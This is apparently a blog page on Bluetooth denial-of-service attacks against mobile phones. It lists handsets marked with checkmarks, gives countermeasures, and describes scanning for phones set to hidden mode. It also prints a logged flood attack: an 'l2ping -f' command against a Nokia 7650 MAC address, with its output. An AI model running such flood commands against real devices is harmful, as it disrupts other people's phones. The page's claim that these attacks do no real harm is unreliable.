Nokia 8910i                                             ✓

Nokia 610 Car Kit                          ✓

Nokia 810 Car Phone                     ✓

Sony Ericsson R520m                            ✓

Sony Ericsson T39m                               ✓

Mobile Phone Handset                   DOS Attack

 

Sony Ericsson T68i                                ✓

Sony Ericsson T610                               ✓

Sony Ericsson Z600                               ✓

Siemens *35 Series                                ✓

Siemens 45 Series                          ✓

Siemens C55                                          ✓

Siemens V55                                          ✓

Motorola S55                                         ✓

iPaq H3970                                            ✓

iPaq H3870                                            ✓

iPAQ rx3115                                          ✓

Motorola Timeport                                ✓

Motorola T720                                       ✓

LG G1610                                              ✓

LG U8200                                              ✓

LG U8120                                              ✓

LG M4300                                             ✓

 

 

 

 

 

 

 

Countermeasures to DO

Mobile Phone Handset                          DOS Attack

S attacks

  1. It is a good idea to download and install the latest patches and updates made available by the mobile phone manufactures.
  2. Mobile phone operators should set up a SMS proxy that scans and filters out all malformed SMS text messages and prevents them from reaching the users. This will limit the chances of malicious DOS attacks taking place.
  3. One should not accept an incoming message (via Bluetooth or Infrared) from unknown people.
  4. One should always remember that mobile phone device related DOS attacks do not really cause any malicious harm. On most occasions, such attacks will not steal or delete any sensitive data but will merely cause inconvenience and annoyance.
  5. A number of handset manufactures advise users to always keep their Bluetooth enabled mobile phones in the hidden Although this is not a foolproof countermeasure, it will definitely make the attacker job all the more difficult.
  6. One should not pair their mobile phone with unknown devices. Pairing your mobile phone with unknown devices can make you vulnerable to a variety of different attacks. Always pair your mobile phone with known trusted devices available in the private setting.
  7. One should try and use a long and difficult to guess PIN code for security purposes.

Hacking Truth: Most people remain under the wrong impression that once their mobile phone device is in the hidden mode then they are safe. Most mobile phone devices (even when they are in hidden mode) are known to respond to 12ping echo requests. An attacker can easily detect the presence of a hidden mobile phone device by send ping requests to a range of probable MAC addresses. Such a technique of discovering even hidden mobile phone devices is known as address scanning. It is important to note that not all mobile phone devices are vulnerable to this technique.

Live Attack Logged Data

Case Study 1

The following is an excerpt from the log file of a live Ping flooding DOS attack that was executed against the Nokia 7650 handset with the help of the l2ping tool:

/home/ankitfadia # l2ping —f 00:60:57:B9:A1:2C

Ping: 00:60:57:B9:A1:2C from 00:80:37:B9:A1:2B (data size 20) …

20 bytes from 00:60:57:B9:A1:2C id 100 time 63.31ms

20 bytes from 00:60:57:B9:A1:2C id 101 time 42.39ms

20 bytes from 00:60:57:B9:A1:2C id 102 time 39.12m

s 20 bytes from 00:60:57:B9:A1:2C id 101 time 40.11ms

 20 bytes from 00:60:57:B9:A1:2C id 102 time 41.51ms

 20 bytes from 00:60:57:B9:A1:2C id 101 time 40.33ms

 20 bytes from 00:60:57:B9:A1:2C id 102 time 40.25ms

20 bytes from 00:60:57:B9:A1:2C id 101 time 40.29ms

 20 bytes from 00:60:57:B9:A1:2C id 102 time 40.27ms

 

Once the maximum limit of number of allowable connections has been reached then the victim Nokia 7650 device can no longer accept any more Bluetooth connections. As a result if any other Bluetooth device tries to establish a connection with the victim device then the following error message is displayed:

Can’t connect. Maximun number of Bluetooth connections used.

 

Leave a Reply

Your email address will not be published. Required fields are marked *